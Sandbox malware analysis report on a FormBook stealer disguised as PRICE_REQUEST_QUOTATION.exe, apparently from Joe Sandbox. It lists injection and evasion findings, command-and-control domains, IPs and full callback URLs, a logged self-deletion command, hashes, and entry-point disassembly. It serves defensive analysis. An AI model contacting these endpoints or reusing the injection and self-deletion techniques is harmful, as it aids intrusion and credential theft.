          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h]17_2_04C8A61C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h]17_2_04C8A61C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C73A1C mov eax, dword ptr fs:[00000030h]17_2_04C73A1C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C5E620 mov eax, dword ptr fs:[00000030h]17_2_04C5E620
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D0FE3F mov eax, dword ptr fs:[00000030h]17_2_04D0FE3F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C937F5 mov eax, dword ptr fs:[00000030h]17_2_04C937F5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h]17_2_04C61B8F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h]17_2_04C61B8F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D0D380 mov ecx, dword ptr fs:[00000030h]17_2_04D0D380
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C8B390 mov eax, dword ptr fs:[00000030h]17_2_04C8B390
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]17_2_04CD7794
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]17_2_04CD7794
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]17_2_04CD7794
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D1138A mov eax, dword ptr fs:[00000030h]17_2_04D1138A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D25BA5 mov eax, dword ptr fs:[00000030h]17_2_04D25BA5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C5DB40 mov eax, dword ptr fs:[00000030h]17_2_04C5DB40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C6EF40 mov eax, dword ptr fs:[00000030h]17_2_04C6EF40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D28B58 mov eax, dword ptr fs:[00000030h]17_2_04D28B58
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C5F358 mov eax, dword ptr fs:[00000030h]17_2_04C5F358
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C5DB60 mov ecx, dword ptr fs:[00000030h]17_2_04C5DB60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C6FF60 mov eax, dword ptr fs:[00000030h]17_2_04C6FF60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h]17_2_04C83B7A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h]17_2_04C83B7A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D28F6A mov eax, dword ptr fs:[00000030h]17_2_04D28F6A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h]17_2_04C8A70E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h]17_2_04C8A70E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D1131B mov eax, dword ptr fs:[00000030h]17_2_04D1131B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h]17_2_04CEFF10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h]17_2_04CEFF10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h]17_2_04D2070D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h]17_2_04D2070D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h]17_2_04C54F2E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h]17_2_04C54F2E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 17_2_04C8E730 mov eax, dword ptr fs:[00000030h]17_2_04C8E730
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Code function: 3_2_00409B50 LdrLoadDll

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: www.futurodr.com
            Source: C:\Windows\explorer.exe | Network Connect: 154.208.173.139 80
            Source: C:\Windows\explorer.exe | Domain query: www.snackithalal.com
            Source: C:\Windows\explorer.exe | Network Connect: 109.106.246.165 80
            Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80
            Source: C:\Windows\explorer.exe | Domain query: www.4-6-2.com
            Source: C:\Windows\explorer.exe | Domain query: www.babeshotnud.com
            Source: C:\Windows\explorer.exe | Network Connect: 185.107.56.60 80
            Source: C:\Windows\explorer.exe | Domain query: www.nailsestetic.space
            Source: C:\Windows\explorer.exe | Domain query: www.appleluis.host
            Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exe | Domain query: www.teelandcompany.com
            Source: C:\Windows\explorer.exe | Domain query: www.patrickandmaxine.com
          Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1060000
          Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Memory written: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
          Source: explorer.exe, 00000006.00000000.281211852.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000000.311360069.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe | Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information:

          Yara detected FormBook
            Source: Yara match | File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 2 | Input Capture 1 | Security Software Discovery 221 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph

          [Figure: behavior graph. Behavior Graph ID: 491948; Sample: PRICE_REQUEST_QUOTATION.exe; Start date: 28/09/2021; Architecture: WINDOWS; Score: 100. Process chain: PRICE_REQUEST_QUOTATION.exe started a second PRICE_REQUEST_QUOTATION.exe, which injected explorer.exe; explorer.exe started wscript.exe and autoconv.exe; wscript.exe started cmd.exe, which started conhost.exe. Dropped file: C:\Users\user\AppData\Local\...\akepwc.dll (PE32).]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          PRICE_REQUEST_QUOTATION.exe | 34% | Virustotal |
          PRICE_REQUEST_QUOTATION.exe | 29% | ReversingLabs | Win32.Trojan.Nsisx
          PRICE_REQUEST_QUOTATION.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll | 13% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          17.2.wscript.exe.c28870.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          17.2.wscript.exe.516796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
          3.0.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366

          Domains

          Source | Detection | Scanner | Label
          nailsestetic.space | 2% | Virustotal |
          www.futurodr.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc | 100% | Avira URL Cloud | malware
          http://www.futurodr.com/rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc | 0% | Avira URL Cloud | safe
          http://www.babeshotnud.com/rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc | 0% | Avira URL Cloud | safe
          www.nudesalon.digital/rgoe/ | 0% | Avira URL Cloud | safe
          http://www.patrickandmaxine.com/rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc | 0% | Avira URL Cloud | safe
          http://survey-smiles.com | 0% | Avira URL Cloud | safe
          http://www.teelandcompany.com/rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          nailsestetic.space | 109.106.246.165 | true | true | | unknown
          www.futurodr.com | 154.208.173.139 | true | true | | unknown
          www.babeshotnud.com | 185.107.56.60 | true | true | | unknown
          td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | | unknown
          parkingpage.namecheap.com | 198.54.117.212 | true | false | | high
          teelandcompany.com | 34.102.136.180 | true | false | | unknown
          www.thenewtocsin.com | unknown | unknown | true | | unknown
          www.4-6-2.com | unknown | unknown | true | | unknown
          www.snackithalal.com | unknown | unknown | true | | unknown
          www.nailsestetic.space | unknown | unknown | true | | unknown
          www.appleluis.host | unknown | unknown | true | | unknown
          www.teelandcompany.com | unknown | unknown | true | | unknown
          www.patrickandmaxine.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc | true | Avira URL Cloud: malware | unknown
          http://www.futurodr.com/rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc | true | Avira URL Cloud: safe | unknown
          http://www.babeshotnud.com/rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc | true | Avira URL Cloud: safe | unknown
          www.nudesalon.digital/rgoe/ | true | Avira URL Cloud: safe | low
          http://www.patrickandmaxine.com/rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc | false | Avira URL Cloud: safe | unknown
          http://www.teelandcompany.com/rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc | false | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nsis.sf.net/NSIS_Error | PRICE_REQUEST_QUOTATION.exe | false | | high
          https://bitninja.io | wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp | false | | high
          http://nsis.sf.net/NSIS_ErrorError | PRICE_REQUEST_QUOTATION.exe | false | | high
          http://survey-smiles.com | wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
          154.208.173.139 | www.futurodr.com | Seychelles | 40065 | CNSERVERSUS | true
          185.107.56.60 | www.babeshotnud.com | Netherlands | 43350 | NFORCENL | true
          34.102.136.180 | teelandcompany.com | United States | 15169 | GOOGLEUS | false
          109.106.246.165 | nailsestetic.space | Serbia | 199493 | NETNET-ASRS | true

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:491948
                                      Start date:28.09.2021
                                      Start time:08:02:30
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 7s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:PRICE_REQUEST_QUOTATION.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:27
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@8/2@9/5
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 25.1% (good quality ratio 15.9%)
                                      • Quality average: 51.6%
                                      • Quality standard deviation: 43%
                                      HCA Information:
                                      • Successful, ratio: 83%
                                      • Number of executed functions: 99
                                      • Number of non-executed functions: 47
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.209.183, 173.222.108.210, 173.222.108.226, 40.112.88.60, 80.67.82.235, 80.67.82.211
                                      • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                      • Not all processes were analyzed, report is missing behavior information

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      | Match | Associated Sample Name / URL | Detection | Context |
                                      |---|---|---|---|
                                      | 185.107.56.60 | gRd8HGFpL7.exe | malicious | www.pxwuo.com/kgw/?8pBp5p=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN0BUW6oeKdMTmJKWlw==&LXPL=yvqlQXkhnxmxPrbP |
                                      | | 5j6RsnL8zx.exe | malicious | www.tomatrader.com/8rg4/?Txlp=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV&OHX=JRmh |
                                      | | QUOTE110.exe | malicious | www.coolestpornreviews.com/vcd/?YVMtapH=LyDxHldb+KlOSDua8YCOPwjDVdjcS2dbW4Dz7bHlFL8lQur/HOk9HtLfSHz2pyKhCdo+&BB=Lzr4TtmpAHX4 |

                                      Domains


                                      ASN


                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\4gyujazywsbdaoe
                                      Process:C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):216882
                                      Entropy (8bit):7.993293156280056
                                      Encrypted:true
                                      SSDEEP:6144:71sLVyecy+1K1bqg5pcPtdi+wSagdVBFJ6uQgVd0kI:71DdIqg5pcji+a6VLJ6vP
                                      MD5:F3364C6B2D2FBE79DF14059B0A45B326
                                      SHA1:2102737F5438F054621A71528044F38FF9CB82BC
                                      SHA-256:CA7D46A32EC12479AFEEC23562BD199C91D2DC0912462250D1A3811A7E89BE83
                                      SHA-512:A43EBC1C5975D7A44E9901EED45EADC53B7427FCF7C13A725BE782A972728AF038C92AE0CC954AE705C3EA93F2EB3A37208CD9FB6237B7F5B6899275AA211A27
                                      Malicious:false
                                      Reputation:low
                                      C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll
                                      Process:C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):48128
                                      Entropy (8bit):6.182711541286411
                                      Encrypted:false
                                      SSDEEP:768:1Zi08T7N8+MHPofNnsG7NthUO33gg5Yyn91tMyuuVaRCNLBk0e67y9OLuiSuMwGA:/8T7N8CnhV/1e67y9O9IKoSJCPQRAli3
                                      MD5:0560BA80E8AFE7F5D83EB600602AB426
                                      SHA1:A783F03BC76EE70833D61D69D854674F45D5A223
                                      SHA-256:19013D7428A659774231FD4B5213A463EEAB58A0C347DADFAA95536BD89D3F13
                                      SHA-512:A034974DC569DB8064B9BC5699E33B188C581E716862FED95708A1B2CAACCAA6AE8EE4F4F23989C68EF838EA71271423501B6AEA27A9C216AF9DB9745356B12C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sE..7$.C7$.C7$.CDF.B6$.CDF.B8$.C7$.C.$.CaQ.B6$.CaQ.B6$.CaQ.C6$.CaQ.B6$.CRich7$.C................PE..L....QRa...........!.....j...N............................................................@.............................H...D.......................................................................................................................text...ah.......j.................. ..`.bss.....................................rdata...............n..............@..@.data....4.......6...|..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.911190489576227
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:PRICE_REQUEST_QUOTATION.exe
                                      File size:267109
                                      MD5:85589170af713a03ca622f94429c634a
                                      SHA1:4e0b9dfd13dd6e4b85bca4352be0cec2be9024d7
                                      SHA256:dae6ba220bb0a34de731b57965753391343bfe96f9f3fa4fea48102d3377ccf7
                                      SHA512:1379d1dbed880c664d7314018e676970afd192a423e6144f3bac6b15e5f89fb4bc245adbe462046ccfb6692e0054be18b459bc2757e60d700c03758232682dd9
                                      SSDEEP:6144:F8LxBsicGu14h0W/c8aRyPwSagdVDgfpnYluQgVd0ka7cDp3:/USWDaRaa6VUBqvr03
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                      File Icon

                                      Icon Hash:b2a88c96b2ca6a72

                                      Static PE Info

                                      General

                                      Entrypoint:0x40312a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:b76363e9cb88bf9390860da8e50999d2

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 00000184h
                                      push ebx
                                      push ebp
                                      push esi
                                      push edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+20h], ebx
                                      mov dword ptr [esp+14h], 00409168h
                                      mov dword ptr [esp+1Ch], ebx
                                      mov byte ptr [esp+18h], 00000020h
                                      call dword ptr [004070B0h]
                                      call dword ptr [004070ACh]
                                      cmp ax, 00000006h
                                      je 00007F3494B986C3h
                                      push ebx
                                      call 00007F3494B9B4A4h
                                      cmp eax, ebx
                                      je 00007F3494B986B9h
                                      push 00000C00h
                                      call eax
                                      mov esi, 00407280h
                                      push esi
                                      call 00007F3494B9B420h
                                      push esi
                                      call dword ptr [00407108h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], bl
                                      jne 00007F3494B9869Dh
                                      push 0000000Dh
                                      call 00007F3494B9B478h
                                      push 0000000Bh
                                      call 00007F3494B9B471h
                                      mov dword ptr [0042EC24h], eax
                                      call dword ptr [00407038h]
                                      push ebx
                                      call dword ptr [0040726Ch]
                                      mov dword ptr [0042ECD8h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+38h]
                                      push 00000160h
                                      push eax
                                      push ebx
                                      push 00429058h
                                      call dword ptr [0040715Ch]
                                      push 0040915Ch
                                      push 0042E420h
                                      call 00007F3494B9B0A4h
                                      call dword ptr [0040710Ch]
                                      mov ebp, 00434000h
                                      push eax
                                      push ebp
                                      call 00007F3494B9B092h
                                      push ebx
                                      call dword ptr [00407144h]

                                      Rich Headers

                                      Programming Language:
